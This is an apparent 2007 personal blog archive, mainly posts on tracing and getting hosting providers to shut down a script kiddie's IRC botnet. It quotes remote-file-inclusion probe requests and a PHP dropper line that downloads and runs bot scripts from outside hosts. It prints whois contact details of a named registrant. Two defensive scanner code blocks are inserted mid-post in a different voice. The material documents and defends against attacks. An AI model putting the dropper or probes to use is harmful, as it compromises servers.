
Latihan Angka

2007/01/28 filed under /perl

After doing my homework for my Indonesian language course, I wondered if there was already a module that would transform numbers into their written Indonesian equivalent. For instance, 10 would return sepuluh (= ten).

Of course it already exists, and once again I didn't get to write a module for it. Instead, I wrote a little extra-homework generator with it: Latihan Angka 1 and Latihan Angka 2.

(for those curious, Latihan Angka means Number Practice)

Terima kasih, Steven Haryanto!

Posted by: B10m | permanent link | comments (2)

A talk with a Botnet script kiddie

2007/01/23 filed under /web

As mentioned before I've been obsessed with stopping botnets. Well, this one, operated by a script kiddie named "fazanul".

Today I've seen his attack on my machine again. And, after sending the usual abuse emails, I've decided to have a little chat with him. As I feared, this is the ultimate script kiddie. But first, a little about his latest "attack".

The attack this time was launched using a new host:

GET /p/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?
  + mosConfig_absolute_path=http://fazanul.com/c.txt? HTTP/1.1

Fazanul.com? Interesting! This kiddie was stupid enough to register a domain. He's, however, still abusing the Savant2 hole. So who's behind fazanul.com?

$ gwhois fazanul.com
[...]
Domain Name.......... fazanul.com
  Creation Date........ 2007-01-23
  Registration Date.... 2007-01-23
  Expiry Date.......... 2008-01-23
  Organisation Name.... Stanley Livingston
  Organisation Address. 455 Rose Quartz Place
  Organisation Address. 
  Organisation Address. Castle Rock
  Organisation Address. 80108
  Organisation Address. CO
  Organisation Address. UNITED STATES

Admin Name........... Stanley Livingston
  Admin Address........ 455 Rose Quartz Place
  Admin Address........ 
  Admin Address........ Castle Rock
  Admin Address........ 80108
  Admin Address........ CO
  Admin Address........ UNITED STATES
  Admin Email.......... fazanul5004@yahoo.com
  Admin Phone.......... +1.9094813680
  Admin Fax............ 

Tech Name............ YahooDomains TechContact
  Tech Address......... 701 First Ave.
  Tech Address......... 
  Tech Address......... Sunnyvale
  Tech Address......... 94089
  Tech Address......... CA
  Tech Address......... UNITED STATES
  Tech Email........... domain.tech@YAHOO-INC.COM
  Tech Phone........... +1.6198813096
  Tech Fax............. 
  Name Server.......... yns1.yahoo.com
  Name Server.......... yns2.yahoo.com

You've got to be kidding me! He registered it today! And look at that, we have fazanul5004@yahoo.com, and it looks like Yahoo is hosting this domain.

$ host fazanul.com
fazanul.com has address 68.142.212.125
fazanul.com has address 68.142.212.126
fazanul.com has address 68.142.212.127
fazanul.com has address 68.142.212.128
fazanul.com has address 68.142.212.129
fazanul.com has address 68.142.212.130
fazanul.com mail is handled by 20 mx1.biz.mail.yahoo.com.
fazanul.com mail is handled by 30 mx5.biz.mail.yahoo.com.

Ugh, yeah, the files are even hosted by Yahoo (the IPs belong to Yahoo). So those should be gone within 48 hours ;-)

So, now that we've found his domain, let's have a little chat with him. He chose Bucharest.RO.EU.Ultra-Chat.Org again as command center, yet this time the channel #out. Let's login, and why not use the nickname Sorin (remember? ;-)

Here's what happened... enjoy (the comments between the chat excerpts were added by me later)

<Sorin> Fazanul!
<Sorin> You're back :-)
<Sorin> Let's see how long fazanul.com will last
<fazanul> ??
<fazanul> what?
<Sorin> I've killed your MUIE botnet before ... and another one after that I
          believe ...
<Sorin> let's see how long it'll take to kill this botnet
<Sorin> But ermm, registering your domain @ yahoo?!? Are you crazy man?
<fazanul> nop
<fazanul> haking host
<Sorin> Ok ... well, let's see how long these drones here will last
<Sorin> Oh you now hack domain registry servers?
<fazanul> yeah
<Sorin> Ah ok ... somehow I have a hard time believing you. Your botnet Perl
          scripts look like crappy cut'n'paste jobs, not showing too much
          knowledge and full of script kiddie fingerprints ...
<fazanul> i have haking host and redirect and domains
<Sorin> fazanul.com has address 68.142.212.128
<fazanul> domains by yahooo
<Sorin> The whois points to yahoo, the IP points to yahoo ... so you hack
          Yahoo's Domain Registry service. Sweet
<fazanul> lollll

Yeah right ... he's registering domains through Yahoo himself now?

<Sorin> anyways, let's see how long it'll be up.
<fazanul> ok man 
<fazanul> part
<fazanul> by channels
<fazanul> i have work
<Sorin> Can't you ban me? Like usually? ;-)
<fazanul> nop
<fazanul> part you
<Sorin> Oh well, will see your next "attack" ... and remember I'll stop those
          too ;-P
<Sorin> #muie is awfully empty ...
<fazanul> yeah
<fazanul> stop

Did he just ask me to *stop* attacking his botnets?!?

<Sorin> Why? You attack my machine, I attack you. Too bad I'm a little more
          successful
<fazanul> what machine you?
<Sorin> Oh come on ... I won't tell you. That's spoiling the fun. I don't
          know your next move, you don't know my host
<fazanul> ntroduction
<fazanul> E-mail for several domains are handled by mail.b10m.net
          <212.238.141.98>, most likely the domain you've tried to reach
          too.
[snipped more info from mail.b10m.net here]

I logged into the IRC channel from this machine (mail.b10m.net). He was clever enough to look that up. Unfortunately for him, the attacks are *not* launched on this vhost ;-)

Anyways, now we know *his* IP address: 

212.138.64.171 - - [22/Jan/2007:23:36:54 +0100] "GET / HTTP/1.0" 200 3240 
"-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.9) 
Gecko/20061206 Firefox/1.5.0.9"


<fazanul> ....
<fazanul> understand
<Sorin> Oh, you got me there.
<Sorin> Darn it
<fazanul> -mail for several domains are handled by mail.b10m.net
          <212.238.141.98>
<fazanul> :))))
<fazanul> hashahahahaha

Funny, he actually pointed out a typo to me. That IP address *used* to be my IP address. Nowadays I have 217.19.21.103...

<Sorin> Ah yes ... oh well, I talk to you later then
<fazanul> to believe
<Sorin> You're too smart for me
<fazanul> :))))))))

SignOff: Sorin (fazanul ... the ultimate script kiddie)

Let's see how long this new botnet will last ... and let's see when I will meet my buddy fazaNULL again :-)


Update (2007/01/24): poor, poor fazanul. After a canned reply from Yahoo abuse (in which they really shared my pain of receiving spam, but noted that the message didn't originate at a Yahoo mail server; what message again?), they did act on this domain:

$ HEAD http://fazanul.com/c.txt
503 Service Temporarily Unavailable
[...]
X-Host: p10w8.geo.mud.yahoo.com
X-INKT-SITE: http://us.geocities.com/server-errors
X-INKT-URI: http://us.geocities.com/server-errors/pd_disabled.html

And sure enough, http://fazanul.com/ is pretty obvious:

Site Temporarily Disabled

This site has been temporarily disabled. If you are the owner of the site, please contact customer care.

Mission accomplished ... again ;-)

Posted by: B10m | permanent link | comments (4)

The MUIE Botnet

2007/01/23 filed under /web

Looking at your Apache logfiles can be fun. A lot of annoying people try to do all kinds of crazy stuff. Today I noticed this GET request:

GET /p/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?
  + mosConfig_absolute_path=http://electrafusion.com/c.txt?? 
  + HTTP/1.1

Since I'm not a fan of PHP, chances are I don't have this file. And yup, I was correct. I didn't have that file. But the URI in there made me curious. What is that c.txt doing exactly?
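The request quoted here, and the one in the fazanul post above, both carry a complete URL in the mosConfig_absolute_path parameter, which is what makes them remote file inclusion probes rather than ordinary 404 noise. As an added example (not code from this blog), here is a small scanner that pulls such probes out of an Apache access log and lists the hosts serving the payload, which is the whois/abuse-report step the posts go through by hand. The log lines in the block are constructed for the example: the client addresses, timestamps and user agents are made up, and only the request targets are the ones quoted in the posts.

```python
"""Flag remote-file-inclusion (RFI) probes in Apache access logs.

Added example; this is not code from the original posts. A complete URL in a
query parameter is exactly what an RFI probe needs: with register_globals and
allow_url_include on, the vulnerable PHP file fetches and runs that remote
script. This scanner parses combined-format log lines, decodes the query
string and reports every parameter whose value points at a remote host.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Apache "combined" format: client ident user [time] "request" status bytes ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# A value that starts with a scheme and a host is what include()/require()
# would fetch remotely; local values such as "about" do not match.
REMOTE_RE = re.compile(r'^(https?|ftp)://([^/?#:]+)', re.IGNORECASE)

# Constructed sample log (the request targets are the ones quoted in the
# posts; client addresses, times and agents are made up for the example).
SAMPLE_LOG = [
    '10.0.0.1 - - [23/Jan/2007:10:12:01 +0100] "GET /p/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://fazanul.com/c.txt? HTTP/1.1" 404 512 "-" "Mozilla/4.0"',
    '10.0.0.2 - - [23/Jan/2007:10:13:44 +0100] "GET /p/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://electrafusion.com/c.txt?? HTTP/1.1" 404 512 "-" "libwww-perl/5.805"',
    '10.0.0.3 - - [23/Jan/2007:10:15:09 +0100] "GET /index.php?page=about HTTP/1.1" 200 3240 "-" "Mozilla/5.0"',
    '10.0.0.4 - - [23/Jan/2007:10:16:30 +0100] "GET / HTTP/1.0" 200 3240 "-" "Mozilla/5.0"',
]


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_rfi(line):
    """Return one finding per query parameter whose value is a remote URL."""
    rec = parse_line(line)
    if rec is None:
        return []
    parts = urlsplit(rec["target"])
    findings = []
    # parse_qsl percent-decodes the values, so http%3A%2F%2F... is caught too.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        m = REMOTE_RE.match(value.strip())
        if m:
            findings.append({
                "client": rec["client"],
                "time": rec["time"],
                "path": parts.path,
                "param": name,
                "remote_host": m.group(2).lower(),
                "status": int(rec["status"]),
            })
    return findings


def scan(lines):
    """Scan an iterable of log lines and collect all RFI findings."""
    findings = []
    for line in lines:
        findings.extend(find_rfi(line))
    return findings


def hosts_to_report(findings):
    """Distinct hosts serving the payload: the whois/abuse targets of the posts."""
    return sorted({f["remote_host"] for f in findings})


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for h in hits:
        print(f'{h["time"]} {h["client"]} {h["path"]} {h["param"]}={h["remote_host"]} -> {h["status"]}')
    print("payload hosts:", ", ".join(hosts_to_report(hits)))
```

The status code is kept in each finding on purpose: a 404 (as here, where the file does not exist) is noise worth an abuse mail, while a 200 on a file you do have is the signal to pull the box off the network and check /tmp for the dropped files.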

<?
shell_exec('cd /tmp;wget http://electrafusion.com/botek.txt;
   + mv botek.txt .sessx;perl .sessx;rm botek.txt.*;
   + wget http://saids.com/a;chmod +x a;
   + mv a sess_vttn737j6k0mci66akhs5u1261;
   + ./sess_vttn737j6k0mci66akhs5u1261;
   + rm a*');
...
?>

Ah! Nice. Go to /tmp, download botek.txt from the same server (see below), move that file to .sessx and execute it. Then delete the botek.txt file, get yet another file (now from saids.com, but a non-existing file...), execute that too, and delete everything.

The script is a little longer, but basically it's trying various ways to get and launch these additional files.

So what does botek.txt do exactly? It opens an IRC connection to Bucharest.RO.EU.Ultra-Chat.Org. On that server (83.170.75.108), it joins the channel #muie and starts listening for commands from two nicknames (fazanul and Sorin ... our 1337 script kiddie). This is in fact rather dangerous. I doubt this botnet will be tremendously big, yet of course this "über hacker" will keep a list of vulnerable hosts. (To you system admins: check if your Savant2_Plugin_textarea.php is vulnerable!)
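For the "check if your Savant2_Plugin_textarea.php is vulnerable" part, here is an added example (not the post's code) of a checker for the pattern behind this kind of hole: a component file that does require_once($mosConfig_absolute_path . '/...') without first verifying that the framework loaded it, so with register_globals on a request can set that variable to a remote URL. The checker flags every include/require whose path starts with a variable unless a defined('_VALID_MOS') or defined('_JEXEC') guard appears earlier in the same file. The two PHP snippets are constructed, with file and variable names following the post; the result is a triage list, not proof of safety, since a guard that lives in another file or a variable that is never request-controlled still needs a human look.

```python
"""Find PHP files that include a path built from a request-controllable variable.

Added example; this is not the posts' code. Heuristic: an include/require
whose path starts with a variable is flagged unless a framework guard
(defined('_VALID_MOS') or defined('_JEXEC')) occurs earlier in the file.
"""
import os
import re
import tempfile

INCLUDE_RE = re.compile(
    r'\b(?P<stmt>include_once|include|require_once|require)\s*\(?\s*'
    r'(?P<var>\$[A-Za-z_][A-Za-z0-9_]*(?:\[[^\]]*\])?)'
)
GUARD_RE = re.compile(r"defined\s*\(\s*['\"](?:_VALID_MOS|_JEXEC)['\"]\s*\)")


def scan_php_source(source, filename="<string>"):
    """Return findings for includes that are not preceded by a framework guard."""
    guard = GUARD_RE.search(source)
    guard_pos = guard.start() if guard else None
    lines = source.splitlines()
    findings = []
    for m in INCLUDE_RE.finditer(source):
        if guard_pos is not None and guard_pos < m.start():
            break  # everything after the guard only runs when loaded by the framework
        lineno = source.count('\n', 0, m.start()) + 1
        text = lines[lineno - 1].lstrip()
        if text.startswith(('//', '#', '*', '/*')):
            continue  # commented-out code
        findings.append({"file": filename, "line": lineno,
                         "statement": m.group("stmt"), "variable": m.group("var"),
                         "source": text.rstrip()})
    return findings


def scan_tree(root):
    """Walk a web root and scan every .php file in it."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            if name.lower().endswith('.php'):
                path = os.path.join(dirpath, name)
                with open(path, encoding='utf-8', errors='replace') as fh:
                    findings.extend(scan_php_source(fh.read(), path))
    return findings


# Constructed samples: the unguarded form and the guarded one.
VULNERABLE_PHP = """<?php
// constructed stand-in for a component file that trusts a global set by the framework
require_once($mosConfig_absolute_path . '/includes/Savant2/Savant2_Plugin.php');
class Savant2_Plugin_textarea { }
"""
FIXED_PHP = """<?php
defined('_VALID_MOS') or die('Direct Access to this location is not allowed.');
require_once($mosConfig_absolute_path . '/includes/Savant2/Savant2_Plugin.php');
class Savant2_Plugin_textarea { }
"""


def demo():
    """Write both samples into a temporary web root and scan it."""
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "Savant2_Plugin_textarea.php"), "w") as fh:
            fh.write(VULNERABLE_PHP)
        with open(os.path.join(root, "Savant2_Plugin_fixed.php"), "w") as fh:
            fh.write(FIXED_PHP)
        return scan_tree(root)


if __name__ == "__main__":
    for f in demo():
        print(f'{f["file"]}:{f["line"]}: {f["statement"]} path starts with {f["variable"]}')
```

Point scan_tree() at the document root of a Mambo/Joomla install; every hit is a file to patch or to put a guard line in front of, and on a server where allow_url_include (or, on older PHP, allow_url_fopen) is on, the hits are the files to worry about first.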

I found a really easy way to get protected against these a**h*les though. Just log in to the IRC server, join #muie with a nickname like MUIE|X|\d+ (where \d+ is a random number ;-) and mock this script kiddie's Perl knowledge. Call him a script kiddie and they'll ban your IP within a minute. Woohoo! Now my server is safe from them, for my server can't log in to the channel ;)

Anyways, after spending some time in the channel, I noticed quite a few vulnerable hosts already, as this picture shows:

Sad but true ...

So who's hosting these files?

$ host electrafusion.com
electrafusion.com has address 208.179.58.67
electrafusion.com mail is handled by 10 electrafusion.com.

$ gwhois 208.179.58.67
Process query: '208.179.58.67'
[...]
OrgName:    Tierzero 
OrgID:      TIERZ
Address:    700 Wilshire Blvd.
Address:    Suite 600
City:       Los Angeles
StateProv:  CA
PostalCode: 90017
Country:    US
[...]
OrgTechHandle: TECHT-ARIN
OrgTechName:   TECH-TIERZERO 
OrgTechPhone:  +1-213-284-0555
OrgTechEmail:  ipnetworkops@tierzero.net
[...]

Start complaining! ;-) I already contacted TierZero, yet I haven't received any replies, and the files are still online :-(

The most ironic thing about this script kiddie is actually the last line of the botek.txt:

# NOTE: DONT REMOVE COPYRIGHTS

Update: TierZero did act on this botnet now:

PING electrafusion.com (208.179.58.67): 56 data bytes
36 bytes from hoanet-gw.dcap1.lax.us.tierzero.net (208.179.32.130): 
Communication prohibited by filter
Vr HL TOS  Len   ID Flg  off TTL Pro  cks      Src      Dst
 4  5  00 5400 a156   0 0000  38  01 b149 xxx.xxx.xxx.xxx  208.179.58.67 

--- electrafusion.com ping statistics ---
1 packets transmitted, 0 packets received, 100% packet loss

Of course I had to tell this Sorin the news, and this is what our conversation was like:

Sorin: w
... thinking I was a zombie, he wanted to see who was online

Me: hahaha where did electrafusion.com go? ;-P
Sorin: bitch

Update: As expected, the script kiddie found a new webserver to download the bot scripts from: http://www.depdiknas.go.id/c.txt

The domain resolves to 222.124.249.2, which belongs to TELKOMNET. abuse@telkom.net.id has been informed and hopefully will respond fast.

I figured I might also be able to get the IRC server taken down:

$ host Bucharest.RO.EU.Ultra-Chat.Org
Bucharest.RO.EU.Ultra-Chat.Org has address 83.170.75.108

$ gwhois 83.170.75.108
Process query: '83.170.75.108'
[...]
% Information related to '83.170.64.0 - 83.170.79.255'

inetnum:        83.170.64.0 - 83.170.79.255
netname:        UK2-NET
descr:          UK2.NET - UK's biggest host
country:        GB
admin-c:        BB963-RIPE
tech-c:         BB963-RIPE
rev-srv:        ns1.uk2.net
rev-srv:        ns2.uk2.net
status:         ASSIGNED PA
mnt-by:         AS13213-MNT
source:         RIPE # Filtered
[...]

This ISP has also been informed.


Update (2007/01/12): The botnet seems to have crumbled! Woohoo!

$ lwp-request -m HEAD http://www.depdiknas.go.id/c.txt
403 Forbidden
[...]

Now that the initial script cannot be called anymore, let's see what we have in our beloved #muie channel:



There are but 2 "users" in there (yes, antimuie is me ;-). Even the fazanul and Sorin nicks are no longer logged in.

Victory!

Posted by: B10m | permanent link | comments (5)

My iPod

2007/01/12 filed under /personal, /linux, /software

In the WebWereld article I was dubbed "Dutch Hacker". The first thing my wife said after reading the article was "Wow, I'm married to a hacker!". That and my new job made her give me an iPod Nano (for I travel to work by train now).

After picking up the iPod Nano, I went to look how to work with it. First, I hooked it up to a Windows laptop and was planning to use the official way, through iTunes. Unfortunately, this application seemed too hard for me. I messed with it for a while, but I really couldn't figure out how to use it. It's just too hard!

So I went for the preferred syncing method, through my own Linux box. I plugged the USB cable in and my OS recognized it straight away. What a relief! So it was time to give gtkpod a go. Too bad it was like iTunes: too hard for me to grasp (I still really have no clue how those two programs work!).

But thank god there were some Perl tools, called gnupod. Easy to use tools, good documentation, and I can finally put my noise on my iPod!

Posted by: B10m | permanent link | comments (2)

Content Theft

2007/01/12 filed under /web

A little while ago I posted a little something on my iPod and Linux. After some time I noticed a weird referer in my log files (by now you should be aware that I occasionally scan my logs for odd entries ;-)

The referer pointed me to a weird site. I've seen this script (used at infobloggs.com) before and it's basically a horrible PHP script, stealing content from other sites to push the owner's own site(s).

As you can see, the text is copied verbatim and a link to 7daycloser.com is appended (I don't see the correlation between Linux, iPods and selling homes either ... iPods are not that expensive).

Of course I was not happy with this. If someone copies my text, I expect them to at least tell where they found it. So I contacted the company hosting infobloggs.com, SiteGround LLC. I was fairly sure this company would act on this kind of lame theft, for they have a copyright notice, as well as an anti-spam policy, posted on their site.

Unfortunately, SiteGround LLC's abuse desk seems to care more about the few bucks made on selling an account than about obeying their own terms, for this is what I received from them:

To help us prevent any copyrights infringement and in accordance with the Digital Millennium Copyright Act, please provide us with the following information:

  1. A physical or electronic signature of the copyright owner or authorized agent;
  2. Identification of the copyrighted work(s) claimed to have been infringed (please provide us with a copyright certificate if available);
  3. Identification of the material that is claimed to be infringing or to be the subject of the infringing activity and information reasonably sufficient to permit us to locate the material (please provide us the URL of the infringing material);
  4. Information regarding how we may contact you (for example, mailing address, telephone number, E-mail address);
  5. A statement that the copyright owner or its authorized agent has a good faith belief that use of the material in the manner complained of is not authorized by the copyright owner, its agent, or the law: "I have a good faith belief that the use of the material in the manner complained of is not authorized by the copyright owner, its agent, or the law."
  6. A statement that the information in the notification is accurate, and made under penalty of perjury, and, if an agent is providing the notification, a statement that the agent is authorized to act on behalf of the owner of an exclusive right that is allegedly infringed: "Under the penalty of perjury I state that the information contained in my complaint is accurate and I am authorized to act on behalf of the owner of the copyright I claim is infringed."

So I provided them with everything they so needed to stop content stealing thugs, yet it was not enough. They needed more:

However in order to proceed with your request we will need the certificate of copyrights provided or court decision stating that our client is not allowed to use the materials in question. Please note that such disputes are generally solved by the court where the web hosting company is not a party.

Clearly they don't care about spammers on their servers and try to get rid of me again. Of course I'm not going to court over this. I was hoping for a good abuse desk, yet Larry Thompson (Abuse Department) was clearly not interested in helping and stopping abuse.

I tried to clarify a few things to Larry:

The hosting company may not usually be a party here, yet since your company hosts the domain and is the owner of the domain, I hold you accountable for this domain and thus for the stealing of content.

But since your company clearly doesn't mind this kind of behavior, I'd like to ask for your permission to publish our email conversation online, for the rest of the world to see. Taking your reaction regarding content theft into account, I doubt you morally (can) refuse this.

Larry refused to reply to this, so I take it I have his permission. Otherwise, sue me in a Dutch court for defamation!

Posted by: B10m | permanent link | comments (6)

TV Crashing?

2007/01/07 filed under /personal

I barely watch TV, but sometimes I like to zap my way through the channels. Today I decided to see what was on and after a while, I noticed this screen:


Unfortunately, I have no clue what channel this is, but based on the position (channel 28) I bet it's one of the local channels.

A little online searching led me to a website telling a little about "NewsCast.exe". I assume they sell the software (it's not clear on the site). Based on the horrific layout of the website, I have no reason to doubt they are the ones responsible for the crash ;-)

(the website isn't interesting enough to translate. Roughly they claim the software is for anyone who wants to broadcast professionally. It's some kind of news system, somewhat similar to TeleText)

I'll update this post if I find out what channel it is that's crashing my tv! (If I don't forget, and care enough ;-)

Posted by: B10m | permanent link | comments (2)

KPN uses opt-out techniques

2007/01/05 filed under /personal

KPN is a Dutch phone company that still, more or less, has a monopoly on the landlines. They feel the heat of the whole VoIP movement and are eagerly trying to keep their customers. Unfortunately, they have now chosen an opt-out technique.

Last week, they deemed it necessary to write me a letter to inform me that they were launching a new product, meaning free calls in the weekend. Of course I had to pay a little more, monthly, but I didn't have to do anything to get this new deal! Wow, great service!

Oh, if I didn't want it, I'd have to return a card with date and signature, which of course I did.

Now what if I didn't receive that letter? A lot of mail mysteriously disappears, every year. Ugh, I hate opt-out stuff like this. I do not want something new, and if I do, I'll ask for it.

Expect a command line Perl script soon for accessing VoipBuster. After this trick, I will call even less through KPN. Shame on you!

Posted by: B10m | permanent link | comments (0)